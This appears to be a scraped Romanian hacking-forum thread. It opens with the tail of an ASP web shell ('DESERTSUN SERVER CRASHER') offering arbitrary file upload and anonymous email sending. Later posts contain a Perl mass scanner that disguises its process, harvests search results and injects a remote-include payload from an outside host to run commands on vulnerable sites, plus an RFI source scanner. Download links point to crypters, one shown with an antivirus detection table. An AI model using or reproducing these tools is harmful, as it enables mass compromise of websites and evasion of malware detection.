color="#00FF00"> </body> </font> </html> <SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT> Const IncludeType = 2 Dim UploadSizeLimit Function GetUpload() Dim Result Set Result = Nothing If Request.ServerVariables("REQUEST_METHOD") = "POST" Then Dim CT, PosB, Boundary, Length, PosE CT = Request.ServerVariables("HTTP_Content_Type") If LCase(Left(CT, 19)) = "multipart/form-data" Then PosB = InStr(LCase(CT), "boundary=") If PosB > 0 Then Boundary = Mid(CT, PosB + 9) PosB = InStr(LCase(CT), "boundary=") If PosB > 0 then PosB = InStr(Boundary, ",") If PosB > 0 Then Boundary = Left(Boundary, PosB - 1) end if Length = CLng(Request.ServerVariables("HTTP_Content_Length")) If "" & UploadSizeLimit <> "" Then UploadSizeLimit = CLng(UploadSizeLimit) If Length > UploadSizeLimit Then Request.BinaryRead (Length) Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B" Exit Function End If End If If Length > 0 And Boundary <> "" Then Boundary = "--" & Boundary Dim Head, Binary Binary = Request.BinaryRead(Length) Set Result = SeparateFields(Binary, Boundary) Binary = Empty Else Err.Raise 10, "GetUpload", "Zero length request." End If Else Err.Raise 11, "GetUpload", "No file sent." End If Else Err.Raise 1, "GetUpload", "Bad request method." End If Set GetUpload = Result End Function Function SeparateFields(Binary, Boundary) Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary Dim Fields Boundary = StringToBinary(Boundary) PosOpenBoundary = InStrB(Binary, Boundary) PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0) Set Fields = CreateObject("Scripting.Dictionary") Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary) Dim HeaderContent, FieldContent, bFieldContent Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type Dim Field, TwoCharsAfterEndBoundary PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf)) HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2) bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2) GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type Set Field = CreateUploadField() Set FieldContent = CreateBinaryData() FieldContent.ByteArray = bFieldContent FieldContent.Length = LenB(bFieldContent) Field.Name = FormFieldName Field.ContentDisposition = Content_Disposition Field.FilePath = SourceFileName Field.FileName = GetFileName(SourceFileName) Field.ContentType = Content_Type Field.Length = FieldContent.Length Set Field.Value = FieldContent Fields.Add FormFieldName, Field TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2)) isLastBoundary = TwoCharsAfterEndBoundary = "--" If Not isLastBoundary Then PosOpenBoundary = PosCloseBoundary PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary) End If Loop Set SeparateFields = Fields End Function Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type) Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";")) Name = (SeparateField(Head, "name=", ";")) If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2) FileName = (SeparateField(Head, "filename=", ";")) If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2) Content_Type = LTrim(SeparateField(Head, "content-type:", ";")) End Function Function SeparateField(From, ByVal sStart, ByVal sEnd) Dim PosB, PosE, sFrom sFrom = LCase(From) PosB = InStr(sFrom, sStart) If PosB > 0 Then PosB = PosB + Len(sStart) PosE = InStr(PosB, sFrom, sEnd) If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf) If PosE = 0 Then PosE = Len(sFrom) + 1 SeparateField = Mid(From, PosB, PosE - PosB) Else SeparateField = Empty End If End Function Function GetFileName(FullPath) Dim Pos, PosF PosF = 0 For Pos = Len(FullPath) To 1 Step -1 Select Case Mid(FullPath, Pos, 1) Case "/", "\": PosF = Pos + 1: Pos = 0 End Select Next If PosF = 0 Then PosF = 1 GetFileName = Mid(FullPath, PosF) End Function Function BinaryToString(Binary) dim cl1, cl2, cl3, pl1, pl2, pl3 Dim L cl1 = 1 cl2 = 1 cl3 = 1 L = LenB(Binary) Do While cl1<=L pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1))) cl1 = cl1 + 1 cl3 = cl3 + 1 if cl3>300 then pl2 = pl2 & pl3 pl3 = "" cl3 = 1 cl2 = cl2 + 1 if cl2>200 then pl1 = pl1 & pl2 pl2 = "" cl2 = 1 End If End If Loop BinaryToString = pl1 & pl2 & pl3 End Function Function BinaryToStringold(Binary) Dim I, S For I = 1 To LenB(Binary) S = S & Chr(AscB(MidB(Binary, I, 1))) Next BinaryToString = S End Function Function StringToBinary(String) Dim I, B For I=1 to len(String) B = B & ChrB(Asc(Mid(String,I,1))) Next StringToBinary = B End Function Function vbsSaveAs(FileName, ByteArray) Dim FS, TextStream Set FS = CreateObject("Scripting.FileSystemObject") Set TextStream = FS.CreateTextFile(FileName) TextStream.Write BinaryToString(ByteArray) TextStream.Close End Function </SCRIPT> <SCRIPT RUNAT=SERVER LANGUAGE=JSCRIPT> function CreateUploadField(){ return new uf_Init() } function uf_Init(){ this.Name = null this.ContentDisposition = null this.FileName = null this.FilePath = null this.ContentType = null this.Value = null this.Length = null } function CreateBinaryData(){ return new bin_Init() } function bin_Init(){ this.ByteArray = null this.Length = null this.String = jsBinaryToString this.SaveAs = jsSaveAs } function jsBinaryToString(){ return BinaryToString(this.ByteArray) } function jsSaveAs(FileName){ return vbsSaveAs(FileName, this.ByteArray) } </SCRIPT> <% If Request.ServerVariables("REQUEST_METHOD") = "POST" Then Set Fields = GetUpload() FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName Fields("File1").Value.SaveAs FilePath End If %> <% Else Dim anonFrom,anonTo,anonSubj,anonBody anonFrom = request.form("From") anonTo = request.form("To") anonSubj = request.form("Subject") anonBody = request.form("Body") Set objMail = CreateObject("CDONTS.NewMail") objMail.From=anonFrom objMail.To=anonTo objMail.Subject=anonSubj objMail.Body=anonBody intReturn=objMail.Send() %> <html> <head><font color="#00FF00"><title>:::: DESERTSUN SERVER CRASHER ::::</title></head> <h1>Message sent successfully!</h1> </font> <table border=0 cellpadding="0" cellspacing="3"> <tr> <td> <font color="#00FF00"> <input type='button' value='Back' onclick=history.back()> </font> </td> <td> <h2><font color="#00FF00">]</font></h2> </td> </tr> </table> </html> <% End if %>
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  8. Ras

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  16. Ras

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  17. intra pe site-ul lor http://www.smartpctools.com apoi dai la Products, dai putin de scroll in jos si ai acolo Smart PC Professional si dai download
  18. Disk Password Protection - boot protection, partition protection Disk Password Protection is complex protection for your computer, disks, partitions and confidential information against unauthorized access. Protect your disks and partitions with a password, hide and protect your information from other people, restrict viewing and launching files. Protect starting operating systems on your computer with a password. It is low-level protection. It works directly with the disk and does not depend on any operating systems, programs or other equipment. Passwords are encrypted and stored in the protected areas of the disk. Owing to this, the protection will work on any computers and can be controlled from any computer. Disk Password Protection offers you to select the type of protection that better meets your requirements. Having an original, simple interface and a step-by-step wizard, the program allows users of any level work with protection. Main features: • Boot protection The computer will boot from a protected disk only after the valid password is entered. • Partition protection A protected partition is invisible on the disk and unavailable for read/write operations. • Low-level protection A protected hard disk is blocked against any read/write operations on the hardware level. • Password-protected launch This feature will allow you to restrict other users' access to the program on your computer. • Command-line support will allow you to automate and hide the process of enabling and disabling disk/partition protection. • The program allows you to enter a password hint. The hint will help you recall your forgotten password. There are no other ways to recover it or to disable protection without the password. • SDK for software developers. SDK allows you to use the functionality of Disk Password Protection in applications where there is a need to protect information on media. Homepage: www.exlade.com Download: http://rapidshare.com/files/60842658/EXLADE_Disk_Password_Protection_v4.8.930.rar
  19. AhnLab-V3 2007.10.6.0 2007.10.05 - AntiVir 2007.10.05 - Authentium 4.93.8 2007.10.05 - Avast 4.7.1051.0 2007.10.06 - AVG 2007.10.06 - BitDefender 7.2 2007.10.06 Trojan.Downloader.Agent.YFZ CAT-QuickHeal 9.00 2007.10.06 - ClamAV 0.91.2 2007.10.06 - DrWeb 2007.10.06 Trojan.DownLoader.origin eSafe 2007.10.04 - eTrust-Vet 31.2.5190 2007.10.06 - Ewido 4.0 2007.10.06 - FileAdvisor 1 2007.10.06 - Fortinet 2007.10.06 - F-Prot 2007.10.05 - F-Secure 6.70.13030.0 2007.10.06 - Ikarus T3.1.1.12 2007.10.06 - Kaspersky 2007.10.06 - McAfee 5135 2007.10.05 - Microsoft 1.2908 2007.10.06 - NOD32v2 2575 2007.10.06 - Norman 5.80.02 2007.10.05 - Panda 2007.10.06 - Prevx1 V2 2007.10.06 - Rising 2007.10.06 - Sophos 4.22.0 2007.10.06 - Sunbelt 2.2.907.0 2007.10.06 - Symantec 10 2007.10.06 - TheHacker 2007.10.06 - VBA32 2007.10.05 - VirusBuster 4.3.26:9 2007.10.06 - Webwasher-Gateway 6.0.1 2007.10.05 - Download: http://rapidshare.com/files/60839827/Simple_Crypter_v2.rar
  20. Download: http://rapidshare.com/files/60765224/K_Cryptor.zip
  21. #!/usr/bin/perl use LWP::Simple; use IO::Socket::INET; print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"; print "\t[ PHP injection scanner 5.0 priv8 version \n\n\n"; if(!@ARGV[0]){ print "\t[ use: perl php5.0.pl <procura> ]\n\n"; exit; } print "\t[ Camuflando pid ]\n"; my $processo = "/usr/local/sbin/httpd - spy"; $SIG{"INT"} = "IGNORE"; $SIG{"HUP"} = "IGNORE"; $SIG{"TERM"} = "IGNORE"; $SIG{"CHLD"} = "IGNORE"; $SIG{"PS"} = "IGNORE"; $0="$processo"."\0"x16;; my $pid=fork; exit if $pid; die "Problema com o fork: $!" unless defined($pid); print "\t[ Pid: $pid Processo: $processo ]\n"; $caxe = "."; $caxe1 = "."; $caxe .= rand(9999); $caxe1 .= rand(9999); $arq = "."; $arq = int rand(9999); open(sites,">$arq"); print sites ""; close(sites); $procura = @ARGV[0]; chomp $procura; print "\t[ Procurando por $procura no Google ]\n"; for($n=0;$n<900;$n += 10){ $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort => 80, Proto => "tcp") or next; print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n"; print $sock "Host: www.google.com.br"; print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; print $sock "Accept-Language: pt-br, pt;q=0.50"; print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9"; print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; print $sock "Keep-Alive: 300"; print $sock "Connection: keep-alive"; @resu = <$sock>; close($sock); $ae = "@resu"; while ($ae=~ m/<a href=.*?>.*?<\/a>/){ $ae=~ s/<a href=(.*?)>.*?<\/a>/$1/; $uber=$1; if ($uber !~/translate/) { if ($uber !~ /cache/) { if ($uber !~ /"/) { if ($uber !~ /google/) { if ($uber !~ /216/) { if ($uber =~/http/) { if ($uber !~ /start=/) { open(arq,">>$arq"); print arq "$uber\n"; close(arq); }}}}}}}}} print "\t[ Procurando por $procura no Cade ]\n"; for($cadenu=1;$cadenu <= 991; $cadenu +=10){ @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next; $ae = "@cade"; while ($ae=~ m/<em class=yschurl>.*?<\/em>/){ $ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/; $uber=$1; $uber =~ s/ //g; $uber =~ s/[b]//g; $uber =~ s/<\/b>//g; open(a,">>$arq"); print a "$uber\n"; close(a); }} print "\t[ Pronto sites pegos no google e cade ]\n"; print "\t[ Excluindo os sites repetidos ]\n"; $ark = $arq; @si = ""; open (arquivo,"<$ark"); @si = <arquivo>; close(arquivo); $novo =""; foreach (@si){ if (!$si{$_}) { $novo .= $_; $si{$_} = 1; } } open (arquivo,">$ark"); print arquivo $novo; close(arquivo); $a =0; $b =0; open(ae,"<$arq"); while(<ae>) {$sites[$a] = $_; chomp $sites[$a]; $a++; $b++;} close(ae); print "\t[ Total de sites para scanear: $a ]\n"; for ($a=0;$a<=$b;$a++){ open (file, ">$caxe"); print file ""; close(file); open (file, ">$caxe1"); print file ""; close(file); $k=0; $e=0; $data=get($sites[$a]) or next; while($data=~ m/<a href=".*?">.*?<\/a>/){ $data=~ s/<a href="(.*?)">.*?<\/a>/$1/; $ubersite=$1; if ($ubersite =~/"/) { $nu = index $ubersite, '"'; $ubersite = substr($ubersite,0,$nu); } if ($ubersite !~/http/) {$ubersite = $sites[$a].'/'.$ubersite;} open(file,">>$caxe") || die("nao abriu caxe.txt $!"); print file "$ubersite\n"; close(file); } $lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/'; $t =0; $y =0; @ja; open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt"; while (<opa>) { $ja[$t] = $_; chomp $ja[$t]; $t++; $y++; } close(opa); $t=1; while ($t < $y) { if ($ja[$t] =~/=/) { $num = rindex $ja[$t], '='; $num += 1; $ja[$t] = substr($ja[$t],0,$num); open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt"; print jaera "$ja[$t]$lista1\n"; close(jaera); $num = index $ja[$t], '='; $num += 1; $ja[$t] = substr($ja[$t],0,$num); $num1 = rindex $ja[$t], '.'; $subproc = substr($ja[$t],$num1,$num); open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt"; print jaera "$ja[$t]$lista1\n"; close(jaera); } $t++; } $ark = "$caxe1"; @si = ""; open (arquivo,"<$ark"); @si = <arquivo>; close(arquivo); $novo =""; foreach (@si){ if (!$si{$_}) { $novo .= $_; $si{$_} = 1; } } open (arquivo,">$ark"); print arquivo $novo; close(arquivo); $q=0; $w=0; @hot; open (ops,"<$caxe1"); while(<ops>) { $hot[$q] = $_; chomp $hot[$q]; $q++; $w++; } close(ops); print "\t[ Começando o scan aguarde. Pode demorar horas. ]\n"; for($q=0;$q<=$w;$q++) { if ($hot[$q] =~/http/) { $tipo=get($hot[$q]) or next; if($tipo =~/root/) { if ($tipo =~/etc/) { if ($tipo =~/boot/) { open(a,">>res.txt"); print a "$hot[$q]\n"; close(a); }}}}}} print "\t[ Pronto scanner concluido ]\n"; print "\t[ O resultado foi salvo no ftp do spykids ]\n"
  22. <?php /*************************************************************************** * PHP Evil RFI Scanner v1.2 * * * * Copyright © 2007 by evilsocket * * * * http://www.evilsocket.net * * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * * This program is distributed in the hope that it will be useful, * * but WITHOUT ANY WARRANTY; without even the implied warranty of * * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * * GNU General Public License for more details. * * * * You should have received a copy of the GNU General Public License * * along with this program; if not, write to the * * Free Software Foundation, Inc., * * 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * * ***************************************************************************/ /* regex per individuare le inclusioni */ $escan_inc_regex = array( '/include(_once)?.\$/ix', '/require(_once)?.\$/ix' ) ; /* regex per estrarre il nome delle variabili */ $escan_var_regex = array( '/\Ainclude(_once)?./is', '/\Arequire(_once)?./is' ) ; /* array di estensioni dei file da scansionare */ $escan_valid_ext = array( 'php' ); /* massima grandezza di un file da scansionare, se 0 scansiona tutti */ $escan_max_size = 0; /* contatore delle directory scansionate */ $escan_dir_count = 0; /* contatore dei file scansionati */ $escan_file_count = 0; /* contatore dei potenziali rfi trovati */ $escan_match_count = 0; /* contatore dei bytes totali scansionati */ $escan_byte_count = 0; escan_banner(); if( $argc < 2 ){ escan_usage($argv[0]); } else{ $stime = escan_get_mtime(); escan_recurse_dir( realpath($argv[1]).DIRECTORY_SEPARATOR ); $etime = escan_get_mtime(); print "\n@ Scan report : \n\n" . "\t$escan_dir_count directory .\n". "\t$escan_file_count file .\n". "\t" . escan_format_size($escan_byte_count) . " .\n". "\t$escan_match_count potenziali RFI .\n". "\t".($etime-$stime) . " secondi di elaborazione .\n\n"; } /* formatta in una stringa una grandezza espressa in bytes */ function escan_format_size($bytes) { if( $bytes < 1024 ) return "$bytes bytes"; if( $bytes < 1048576 ) return ($bytes / 1024) . " Kb"; if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb"; return ($bytes / 1073741824) . " Gb"; } /* restituisce il timestamp espresso in secondi */ function escan_get_mtime() { list($usec, $sec) = explode(" ",microtime()); return ((float)$usec + (float)$sec); } /* estrae la linea di codice dell inclusione */ function escan_scan_line($content,$offset) { list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($c ontent)) ); return $line.";"; } /* estrae il nome della variabile dalla riga di codice dell inclusione */ function escan_parse_var( $line, $regex_id ) { global $escan_var_regex; $vars = preg_split($escan_var_regex[$regex_id],$line); $varname = $vars[1]; $delimiters = " .);"; for( $i = 0; $i < strlen($varname); $i++ ){ for( $j = 0; $j < strlen($delimiters); $j++ ){ if($varname[$i] == $delimiters[$j]){ return substr( $varname, 0, $i ); } } } return $varname; } /* controlla se la variabile $var viene definita in $content prima della posizio ne $offset */ function escan_check_definitions($content,$offset,$var) { if( strpos( $var, "->" ) ){ return 1; } $chunk = substr($content,0,$offset); $regex = "/".preg_quote($var,"/")."\s*=/ix"; preg_match( $regex, $chunk,$matches ); return count($matches); } /* parserizza il file $file per controllare la presenza di potenziali rfi */ function escan_parse_file($file) { global $escan_inc_regex; global $escan_max_size; global $escan_file_count; global $escan_match_count; global $escan_byte_count; $fsize = filesize($file); if( $escan_max_size && $fsize > $escan_max_size ) return; $escan_file_count++; $escan_byte_count += $fsize; $content = @file_get_contents($file); for( $i = 0; $i < count($escan_inc_regex); $i++ ){ if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PR EG_OFFSET_CAPTURE ) ){ $nmatch = count($matches[0]); for( $j = 0; $j < $nmatch; $j++ ){ $offset = $matches[0][$j][1]; $line = escan_scan_line($content,$offset); $var = escan_parse_var($line,$i); if( escan_check_definitions($content,$offset,$var) == 0 ) { $escan_match_count++; print "@ $file - \n\t- '$var' alla posizione $offset .\n"{ ; } } } } } } /* restituisce l'estensione del file $fname */ function escan_get_file_ext($fname) { if( strchr($fname,'.') ){ return substr($fname,strrpos($fname,'.')+1); } else{ return ""; } } /* controlla se il file $fname
  23. Download: http://rapidshare.com/files/60758402/Cgi_Checker_v2.0.zip
  24. welcome! ne cunoastem de pe alt forum.
  25. Ras

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